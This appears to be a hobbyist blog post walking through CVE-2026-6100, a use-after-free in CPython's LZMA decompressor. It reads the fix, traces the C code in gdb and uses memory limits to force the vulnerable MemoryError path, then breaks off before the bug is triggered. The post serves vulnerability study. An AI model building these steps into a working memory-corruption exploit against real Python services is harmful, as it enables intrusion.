Exploiting CVE-2026-6100 for Amusement and Misery

17 Apr, 2026

6550 words | 31 minutes

So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours a day on Twitter dot com, usually ranging from 1h to 2h. I’d open the app up to 125 times with an average of about 90? opens in a day, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more right skewed ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.

Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:


Fig: The Tweet

I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!

The Bug

The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.

Anyway, let’s read the CVE report and try to understand what’s going on.

The CVE Report

The CVE report in full reads as such:

Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure

Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.

So, some things to note:

This is exploitable under “memory pressure”. This… will become important later.
This requires the reuse of a decompressor instance even after a MemoryError occurs.
This affects the Python implementations of LZMA, BZ2 and Gzip, which implies some shared logic fault in their implementations.
Not included in the Description but instead down below under the CWEs, it’s stated that this is both a UAF and an OOB Write. Huh!
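For contrast, here's roughly what the "not vulnerable" usage from the report looks like. This is a minimal sketch, not anything from CPython itself: decompress_chunks is a made-up helper name, and the only real API used is lzma.LZMADecompressor with its decompress() method and eof attribute. The point is just that the instance gets dropped on MemoryError and never sees another decompress() call.

```python
import lzma


def decompress_chunks(chunks):
    """Feed chunks to one decompressor, but never reuse it after an error.

    decompress_chunks is a hypothetical helper, not part of the lzma module.
    """
    decompressor = lzma.LZMADecompressor()
    out = bytearray()
    try:
        for chunk in chunks:
            out += decompressor.decompress(chunk)
            if decompressor.eof:
                break  # calling decompress() after EOF would raise EOFError
    except MemoryError:
        # The instance may hold stale internal state now: drop it rather
        # than calling decompress() on it again, and let the caller decide.
        del decompressor
        raise
    return bytes(out)


payload = lzma.compress(b"hello " * 100)
chunks = [payload[i:i + 16] for i in range(0, len(payload), 16)]
result = decompress_chunks(chunks)
```

A caller that wants to retry after the MemoryError would build a fresh LZMADecompressor and start from the first chunk again.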

Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.

The Fix

Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.


Fig: The Fixes

In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.

LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.

Understanding `_lzmamodule.c`

We’re reverse engineers, so we read our code in reverse too!

Let’s start from the very end, the error block that we’re so concerned with:

...
error:
    lzs->next_in = NULL;
    Py_XDECREF(result);
    return NULL;
}

Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:

    /* Allocate if necessary */
    if (d->input_buffer == NULL) {
        d->input_buffer = PyMem_Malloc(lzs->avail_in);
        if (d->input_buffer == NULL) {
            PyErr_SetNone(PyExc_MemoryError);
            goto error;
        }
        d->input_buffer_size = lzs->avail_in;
    }

So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting size lzs->avail_in, which on failure will raise a MemoryError and jump to the error block. So far, so good. What the fuck are d and lzs?

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
...

Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:

typedef struct {
    PyObject_HEAD
    lzma_allocator alloc;
    lzma_stream lzs;
    int check;
    char eof;
    PyObject *unused_data;
    char needs_input;
    uint8_t *input_buffer;
    size_t input_buffer_size;
    PyMutex mutex;
} Decompressor;

But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:

typedef struct {
	const uint8_t *next_in; /**< Pointer to the next input byte. */
	size_t avail_in;    /**< Number of available input bytes in next_in. */
	uint64_t total_in;  /**< Total number of bytes read by liblzma. */

	uint8_t *next_out;  /**< Pointer to the next output position. */
	size_t avail_out;   /**< Amount of free space in next_out. */
	uint64_t total_out; /**< Total number of bytes written by liblzma. */
	lzma_allocator *allocator;

	/** Internal state is not visible to applications. */
	lzma_internal *internal;
	void *reserved_ptr1;
	void *reserved_ptr2;
	void *reserved_ptr3;
	void *reserved_ptr4;
	uint64_t reserved_int1;
	uint64_t reserved_int2;
	size_t reserved_int3;
	size_t reserved_int4;
	lzma_reserved_enum reserved_enum1;
	lzma_reserved_enum reserved_enum2;

} lzma_stream;

Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;

    /* Prepend unconsumed input if necessary */
    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);
    ...
    /* BLAH BLAH BLAH */
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }
    else {
        lzs->next_in = data;
        lzs->avail_in = len;
        input_buffer_in_use = 0;
    }

    result = decompress_buf(d, max_length);
    if (result == NULL) {
        lzs->next_in = NULL;
        return NULL;
    }
...

I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumed input if necessary”, implying this branch is unlikely to be taken on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.

The Python code that would call this function would look a little like this:

import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)

Where data and len are drawn from, well, the data you pass in. This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.

/* Decompress data of length d->lzs.avail_in in d->lzs.next_in.  The output
   buffer is allocated dynamically and returned.  At most max_length bytes are
   returned, so some of the input may not be consumed. d->lzs.next_in and
   d->lzs.avail_in are updated to reflect the consumed input. */
static PyObject*
decompress_buf(Decompressor *d, Py_ssize_t max_length)
{
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
    _BlocksOutputBuffer buffer = {.writer = NULL};
    _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
    assert(state != NULL);

    if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
        goto error;
    }

    for (;;) {
        lzma_ret lzret;

        Py_BEGIN_ALLOW_THREADS
        lzret = lzma_code(lzs, LZMA_RUN);
        Py_END_ALLOW_THREADS

        if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
            lzret = LZMA_OK; /* That wasn't a real error */
        }
        if (catch_lzma_error(state, lzret)) {
            goto error;
        }
        if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
            FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
        }
        if (lzret == LZMA_STREAM_END) {
            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
            break;
        } else if (lzs->avail_out == 0) {
            /* Need to check lzs->avail_out before lzs->avail_in.
               Maybe lzs's internal state still have a few bytes
               can be output, grow the output buffer and continue
               if max_lengh < 0. */
            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
                break;
            }
            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
                goto error;
            }
        } else if (lzs->avail_in == 0) {
            break;
        }
    }

    result = OutputBuffer_Finish(&buffer, lzs->avail_out);
    if (result != NULL) {
        return result;
    }

error:
    OutputBuffer_OnError(&buffer);
    return NULL;
}

For our purposes, this function must not fail (i.e. return NULL), as that’ll kill off the rest of our decompress call (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring actually does elucidate further:

If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.

So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.
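A quick way to see that partial decompression from the Python side is the snippet below. It's a small sketch using only the documented LZMADecompressor API (decompress(), needs_input, eof); the variable names are mine.

```python
import lzma

compressed = lzma.compress(b"asdfgda")
d = lzma.LZMADecompressor()

# Ask for at most one byte of output; the rest of the input stays pending.
first = d.decompress(compressed, 1)

# needs_input goes False when output can still be produced without new input.
pending = not d.needs_input

# Drain the remainder by passing empty input, as the docstring suggests.
rest = d.decompress(b"")
```

After the first call the decompressor is sitting in exactly the "some input left over" state that the rest of this section cares about.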

Looking at the if blocks that come after, we can see what conditions we need to miss:

    if (d->eof) {
        FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
        if (lzs->avail_in > 0) {
            PyObject *unused_data = PyBytes_FromStringAndSize(
                (char *)lzs->next_in, lzs->avail_in);
            if (unused_data == NULL) {
                goto error;
            }
            Py_XSETREF(d->unused_data, unused_data);
        }
    }
    else if (lzs->avail_in == 0) {
        lzs->next_in = NULL;

        if (lzs->avail_out == 0) {
            /* (avail_in==0 && avail_out==0)
               Maybe lzs's internal state still have a few bytes can
               be output, try to output them next time. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);

            /* If max_length < 0, lzs->avail_out always > 0 */
            assert(max_length >= 0);
        } else {
            /* Input buffer exhausted, output buffer has space. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
        }
    }
    else {
        // the actual block we want to hit
    ...

So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.

Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.
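To keep the three-way branch straight, it can be boiled down to a tiny Python function. This is only a mental model of the C above: the function name and the returned labels are invented for illustration, and the arguments mirror d->eof, lzs->avail_in and lzs->avail_out.

```python
def branch_after_decompress_buf(eof, avail_in, avail_out):
    """Name the branch decompress() takes once decompress_buf() has returned."""
    if eof:
        # Stream finished; any leftover input becomes unused_data.
        return "eof"
    if avail_in == 0:
        # Input fully consumed; next_in is reset to NULL on this path.
        if avail_out == 0:
            return "input exhausted, needs_input=0"
        return "input exhausted, needs_input=1"
    # Leftover input: the branch that contains the PyMem_Malloc call.
    return "leftover input"


# No EOF and some input left over is the combination we are aiming for.
target = branch_after_decompress_buf(eof=False, avail_in=36, avail_out=0)
```

Only the last branch leaves next_in pointing at the caller's data while also performing an allocation that can fail.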

Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:

    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);

        /* Number of bytes we can append if we move existing
           contents to beginning of buffer (overwriting
           consumed input) */
        avail_total = d->input_buffer_size - lzs->avail_in;

        if (avail_total < len) {
            size_t offset = lzs->next_in - d->input_buffer;
            uint8_t *tmp;
            size_t new_size = d->input_buffer_size + len - avail_now;

            /* Assign to temporary variable first, so we don't
               lose address of allocated buffer if realloc fails */
            tmp = PyMem_Realloc(d->input_buffer, new_size);
            if (tmp == NULL) {
                PyErr_SetNone(PyExc_MemoryError);
                return NULL;
            }
            d->input_buffer = tmp;
            d->input_buffer_size = new_size;

            lzs->next_in = d->input_buffer + offset;
        }
        else if (avail_now < len) {
            memmove(d->input_buffer, lzs->next_in,
                    lzs->avail_in);
            lzs->next_in = d->input_buffer;
        }
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }

Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!

Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too:

Somehow trigger the MemoryError for PyMem_Malloc(lzs->avail_in).
Call decompress on the same Decompressor object with the residual data in the lzs struct, which should trigger an OOB Write of arbitrary data to the position right after the original data.
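Those two steps can be mocked up in pure Python before touching a debugger. What follows is a toy model, not the real module: ToyDecompressor, its arguments and the 48-byte "heap" are all invented for illustration, offsets into a bytearray stand in for pointers, and the realloc/memmove branches are left out entirely. It only shows why a stale next_in turns the second call into a write past the first buffer.

```python
class ToyDecompressor:
    """Toy model of decompress()'s input handling; heap offsets act as pointers."""

    def __init__(self, heap, patched=False):
        self.heap = heap        # flat bytearray standing in for process memory
        self.patched = patched  # True models the one-line fix
        self.next_in = None     # models lzs->next_in (None plays NULL)
        self.avail_in = 0       # models lzs->avail_in

    def decompress(self, addr, length, consumed=0, malloc_fails=False):
        if self.next_in is not None:
            # "Prepend unconsumed input" path: copy the new bytes right after
            # the old ones, wherever next_in happens to point.
            dst = self.next_in + self.avail_in
            self.heap[dst:dst + length] = self.heap[addr:addr + length]
            self.avail_in += length
            return
        # First use: point at the caller's buffer, then pretend that
        # decompress_buf() consumed part of it.
        self.next_in, self.avail_in = addr + consumed, length - consumed
        if self.avail_in > 0 and malloc_fails:
            if self.patched:
                self.next_in = None  # what the fix adds on the error path
            raise MemoryError


def run(patched):
    heap = bytearray(48)
    heap[0:16] = b"C" * 16    # caller's compressed input
    heap[16:32] = b"V" * 16   # unrelated neighbouring data
    heap[32:36] = b"AAAA"     # input for the second call
    d = ToyDecompressor(heap, patched)
    try:
        d.decompress(addr=0, length=16, consumed=4, malloc_fails=True)
    except MemoryError:
        pass
    d.decompress(addr=32, length=4)  # reuse after the error
    return bytes(heap[16:32])


neighbour_unpatched = run(patched=False)
neighbour_patched = run(patched=True)
```

In the unpatched run the neighbouring bytes get clobbered by the second call's input; in the patched run they survive, because the second call starts from a clean next_in.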

So, shall we?

Pressure Torture

On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.

Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”

Let’s do a little bit of debugging to figure out how we can attain that pressure.

Tracing the `decompress` Call

I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.

However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.

Let’s write a simple script to test the decompress function:

import lzma

decompressor = lzma.LZMADecompressor()

# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)

We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d0db <decompress+000c> mov    QWORD PTR [rbp-0x70], rsi
   0x7ffff7b2d0df <decompress+0010> mov    QWORD PTR [rbp-0x78], rdx
   0x7ffff7b2d0e3 <decompress+0014> mov    QWORD PTR [rbp-0x80], rcx
●→ 0x7ffff7b2d0e7 <decompress+0018> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d0eb <decompress+001c> add    rax, 0x28
   0x7ffff7b2d0ef <decompress+0020> mov    QWORD PTR [rbp-0x50], rax
   0x7ffff7b2d0f3 <decompress+0024> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d0f7 <decompress+0028> mov    rax, QWORD PTR [rax]
   0x7ffff7b2d0fa <decompress+002b> test   rax, rax
─────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+988 ────
    983	 static PyObject *
    984	 decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
    985	 {
    986	     char input_buffer_in_use;
    987	     PyObject *result;
             // d=0x00007fffffff9ea8  →  [...]  →  0x0000000000000002, lzs=0x00007fffffff9ec0  →  0x0000000001000000
 →  988	     lzma_stream *lzs = &d->lzs;
    989	
    990	     /* Prepend unconsumed input if necessary */
    991	     if (lzs->next_in != NULL) {
    992	         size_t avail_now, avail_total;
    993	
─────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffff7b2d0e7 in decompress (), reason: BREAKPOINT

Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:

gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$3 = {
  next_in = 0x0,
  avail_in = 0x0,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
  total_out = 0x0,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

and it will get filled in with our input compressed data once we go further in:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d29d <decompress+01ce> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2a1 <decompress+01d2> mov    rdx, QWORD PTR [rbp-0x78]
   0x7ffff7b2d2a5 <decompress+01d6> mov    QWORD PTR [rax+0x8], rdx
 → 0x7ffff7b2d2a9 <decompress+01da> mov    BYTE PTR [rbp-0x51], 0x0
   0x7ffff7b2d2ad <decompress+01de> mov    rdx, QWORD PTR [rbp-0x80]
   0x7ffff7b2d2b1 <decompress+01e2> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1032 ────
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;
   1031	         lzs->avail_in = len;
                 // input_buffer_in_use=0x0
 → 1032	         input_buffer_in_use = 0;
   1033	     }
   1034	
   1035	     result = decompress_buf(d, max_length);
   1036	     if (result == NULL) {
   1037	         lzs->next_in = NULL;
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$4 = {
  next_in = 0x7ffff77b9ce0 "\3757zXZ",
  avail_in = 0x40,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
...

We continue execution past decompress_buf to see how this changes our structs:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
●→ 0x7ffff7b2d2c0 <decompress+01f1> mov    QWORD PTR [rbp-0x20], rax
   0x7ffff7b2d2c4 <decompress+01f5> cmp    QWORD PTR [rbp-0x20], 0x0
   0x7ffff7b2d2c9 <decompress+01fa> jne    0x7ffff7b2d2e0 <decompress+529>
   0x7ffff7b2d2cb <decompress+01fc> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2cf <decompress+0200> mov    QWORD PTR [rax], 0x0
   0x7ffff7b2d2d6 <decompress+0207> mov    eax, 0x0
...
gef➤  print *(Decompressor *)0x00007fffffff9ea8
$5 = {
  ob_base = {
    {
      ob_refcnt_full = 0x7ffff7c2e440,
      {
        ob_refcnt = 0xf7c2e440,
        ob_overflow = 0x7fff,
        ob_flags = 0x0
      },
      _aligner = 0x40
    },
    ob_type = 0x7fffffff9ed0
  },
...
  check = 0xf7b2c04f,
  eof = 0xff,
  unused_data = 0x0,
  needs_input = 0x2,
  input_buffer = 0x7fffffffa1c0 "\300\234{\367\377\177",
  input_buffer_size = 0x7ffff7c2e440,
  mutex = {
    _bits = 0xa0
  }
}
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$7 = {
  next_in = 0x7ffff77b9cfc "sdfgda",
  avail_in = 0x24,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Note that next_in now points at what looks like the rest of our plaintext (“sdfgda”). This is likely because we passed in a very short string, so the encoder just stored it more or less verbatim inside the compressed stream; next_in is still a pointer into our compressed input, only advanced past the bytes that have been consumed. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the amount of data we requested, while total_in goes up by 0x1c as that’s the length we’ve ingested (and thus incremented next_in by).

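Also, d->eof stays unset (we never hit LZMA_STREAM_END) and lzs->avail_in is non-zero, which means we will very cleanly fall into our target if block to trigger the bug! (Don’t trust the 0xff shown for eof in the Decompressor dump above: 0x00007fffffff9ea8 is the stack slot holding the d pointer rather than the object itself, which is why its first field reads 0x7ffff7c2e440, the real address of the Decompressor.)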
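The bookkeeping in those lzma_stream dumps is easy to sanity-check by hand, or with a few lines of Python. Every number below is copied from the gdb output above; the 0x28 offset is my reading of the add rax, 0x28 in the first disassembly listing, so treat that part as an inference rather than gospel.

```python
# lzma_stream before and after decompress_buf(), copied from the dumps above.
next_in_before, avail_in_before = 0x7ffff77b9ce0, 0x40
next_in_after, avail_in_after, total_in = 0x7ffff77b9cfc, 0x24, 0x1C

# How far next_in moved should match total_in, and avail_in should shrink
# by the same amount.
consumed = next_in_after - next_in_before
remaining = avail_in_before - consumed

# lzs is embedded in the Decompressor; assuming it sits 0x28 bytes in
# (the `add rax, 0x28`), the object itself starts here.
lzs_addr = 0x7ffff7c2e468
decompressor_addr = lzs_addr - 0x28
```

So 0x1c bytes were consumed, 0x24 remain, and the Decompressor object most likely lives at 0x7ffff7c2e440.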

Making `PyMem_Malloc` Fail

So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.

This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.

So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.

We can artificially restrict the resource limits of a Python script with the following:

import resource

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = 64 * 1024 * 1024 # 64 MB

# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit)) 

# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
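Since we'll be flipping this cap on and off a lot, it can be handy to wrap the set/restore pair in a context manager. A minimal sketch, assuming Linux semantics for RLIMIT_AS; address_space_cap is a name I made up, everything else is the standard resource and contextlib modules.

```python
import contextlib
import resource


@contextlib.contextmanager
def address_space_cap(limit_bytes):
    """Temporarily lower the soft RLIMIT_AS, restoring it on exit.

    address_space_cap is a hypothetical helper, not a stdlib function.
    """
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    # Only the soft limit changes. Leaving the hard limit alone is what lets
    # an unprivileged process restore the original value afterwards.
    resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, hard))
    try:
        yield
    finally:
        resource.setrlimit(resource.RLIMIT_AS, (soft, hard))
```

Usage would look like `with address_space_cap(64 * 1024 * 1024): ...`, with the risky call inside the block and any MemoryError caught outside it.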

We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024))), which would create both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)

This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0
$rbx   : 0x00007ffff7c555dc  →  0x0a73000000000001
$rcx   : 0x0
$rdx   : 0xffffffffffffff80
...
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2644f <decompress+0380> mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7b26453 <decompress+0384> mov    rdi, rax
   0x7ffff7b26456 <decompress+0387> call   0x7ffff7b234b0 <PyMem_Malloc@plt>
●→ 0x7ffff7b2645b <decompress+038c> mov    rdx, QWORD PTR [rbp-0x68]
   0x7ffff7b2645f <decompress+0390> mov    QWORD PTR [rdx+0xc8], rax
   0x7ffff7b26466 <decompress+0397> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2646a <decompress+039b> mov    rax, QWORD PTR [rax+0xc8]
   0x7ffff7b26471 <decompress+03a2> test   rax, rax
   0x7ffff7b26474 <decompress+03a5> jne    0x7ffff7b2648a <decompress+955>
...

Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fall through to our error block, which we do!

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264d4 <decompress+0405> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264d8 <decompress+0409> jmp    0x7ffff7b264ec <decompress+1053>
   0x7ffff7b264da <decompress+040b> nop
 → 0x7ffff7b264db <decompress+040c> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264df <decompress+0410> mov    rdi, rax
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
   0x7ffff7b264ed <decompress+041e> ret
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1103 ────
   1098	     }
   1099	
   1100	     return result;
   1101	
   1102	 error:
             // result=0x00007fffffff9ef0  →  [...]  →  <_PyRuntime+10e80> add BYTE PTR [rax], al
 → 1103	     Py_XDECREF(result);
   1104	     return NULL;
   1105	 }
   1106	
   1107	 /*[clinic input]
   1108	 @permit_long_docstring_body

Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so triggering the bug should be trivial from here!
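One way to take some of the guesswork out of that trial and error is to bisect on the cap. The sketch below is generic and makes a big assumption: that "does the run raise MemoryError at this cap" flips exactly once as the cap grows. largest_failing_limit and the fails callback are hypothetical names; in practice fails would launch a fresh interpreter under the cap and report whether it hit a MemoryError, and the example here swaps in a fake probe so the search itself can be run anywhere.

```python
def largest_failing_limit(lo, hi, fails, step=4096):
    """Binary-search the largest cap in [lo, hi] for which fails(cap) is True.

    Assumes fails(lo) is True, fails(hi) is False, and that the outcome is
    monotonic in between. Real allocators can be noisier than that.
    """
    while hi - lo > step:
        mid = (lo + hi) // 2
        if fails(mid):
            lo = mid  # still failing: the boundary is above mid
        else:
            hi = mid  # succeeded: the boundary is at or below mid
    return lo


MIB = 1024 * 1024
fake_threshold = 33 * MIB  # stand-in for the real, unknown boundary


def fake_probe(cap):
    # Pretend any cap below the threshold makes the run raise MemoryError.
    return cap < fake_threshold


boundary = largest_failing_limit(16 * MIB, 64 * MIB, fake_probe)
```

Even with a real probe, this only finds where the MemoryError starts or stops; whether the allocation that fails at that boundary is the PyMem_Malloc we care about still has to be confirmed in gdb.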

Triggering the Bug

